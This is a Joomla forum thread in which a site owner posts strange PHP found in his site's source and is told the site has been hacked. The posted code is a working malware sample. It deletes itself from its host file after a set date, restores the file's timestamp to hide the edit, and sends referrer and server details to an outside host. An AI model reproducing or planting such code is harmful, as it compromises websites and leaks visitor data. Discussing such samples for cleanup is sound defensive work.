Strange code is it from database infusion or file

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
orthodoxkohen
Joomla! Apprentice
Joomla! Apprentice
Posts: 20
Joined: Sun May 24, 2009 4:42 pm

Strange code is it from database infusion or file

Post by orthodoxkohen » Fri Apr 08, 2016 7:31 pm

This strange information is showing up in source code on site

Code: Select all

check_meta();
function check_meta(){
    $jp = __FILE__;
    $jptime = filemtime($jp);

    if(time() >= 1456733425){
        $jp_c = file_get_contents($jp);
        if($t = @strpos($jp_c,"check_meta();")) {
            $contentp = substr($jp_c,0,$t);
            if(@file_put_contents($jp, $contentp)){
                @touch($jp,$jptime);
            }
        }
    }
    @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php");
}
Last edited by mandville on Mon Apr 11, 2016 9:08 am, edited 1 time in total.
Reason: broke link for security reasons
Top
User avatar
brian
Joomla! Master
Joomla! Master
Posts: 12787
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK
Contact:
Contact brian

Re: Strange code is it from database infusion or file

Post by brian » Fri Apr 08, 2016 8:32 pm

Your site has been hacked
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
Top
orthodoxkohen
Joomla! Apprentice
Joomla! Apprentice
Posts: 20
Joined: Sun May 24, 2009 4:42 pm

Re: Strange code is it from database infusion or file

Post by orthodoxkohen » Mon Apr 11, 2016 2:36 am

brian wrote:Your site has been hacked
any help on what file or database field is damaged from said hack?

Bryan
Top
Locked

Return to “Security in Joomla! 1.5”